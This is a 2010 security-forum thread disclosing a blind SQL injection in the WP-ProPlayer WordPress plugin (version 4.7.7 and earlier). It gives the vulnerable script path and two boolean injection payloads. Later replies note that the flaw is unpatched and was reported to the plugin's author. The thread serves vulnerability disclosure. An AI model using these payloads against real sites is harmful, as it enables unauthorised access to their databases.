Author Topic: WP-ProPlayer Plugin Blind SQL Injection  (Read 2473 times)

0 Members and 1 Guest are viewing this topic.

Online ca0s

  • VIP
  • Sir
  • *
  • Posts: 426
  • Cookies: 52
  • Gender: Male
  • ca0s@ka0labs #
    • View Profile
    • ka0labs #
WP-ProPlayer Plugin Blind SQL Injection
« on: December 11, 2010, 11:09:09 pm »
<-------

   WP-ProPlayer Blind SQL Inyection

   Founder: Ca0s

   Visit:
      st4ck-3rr0r.blogspot.com
      ka0-labs.org
   Shouts @
      evilzone.org
      elhacker.net
      diosdelared.com

------->
<-------

   Software: ProPlayer <= 4.7.7
   URL:
      http://wordpress.org/extend/plugins/proplayer/
      http://isagoksu.com/proplayer-wordpress-plugin/
   Vuln: Blind SQL Inyection ->
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='a
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='b

   Note: some servers filter ' to %27 so wont work this way.

------->

Online ande

  • Owner
  • King
  • *
  • Posts: 2460
  • Cookies: 222
    • View Profile
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #1 on: December 12, 2010, 12:06:11 am »
Vulnerability status? I couldn't find any fix notes on their site.

Online ca0s

  • VIP
  • Sir
  • *
  • Posts: 426
  • Cookies: 52
  • Gender: Male
  • ca0s@ka0labs #
    • View Profile
    • ka0labs #
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #2 on: December 12, 2010, 12:58:06 am »
Unfixed.
I reported it to author.

Online ande

  • Owner
  • King
  • *
  • Posts: 2460
  • Cookies: 222
    • View Profile
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #3 on: December 12, 2010, 01:04:08 am »
Unfixed.
I reported it to author.

Sweet, better hope they fix it quick :P

Offline solar

  • NULL
  • Posts: 1
  • Cookies: 0
    • View Profile
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #4 on: February 25, 2011, 07:24:13 pm »
Cool... nice find.

 



Intern0t SoldierX SecurityOverride programisiai
Want to be here? Contact Ande, Bluechill or Kulverstukas on the forum or at IRC.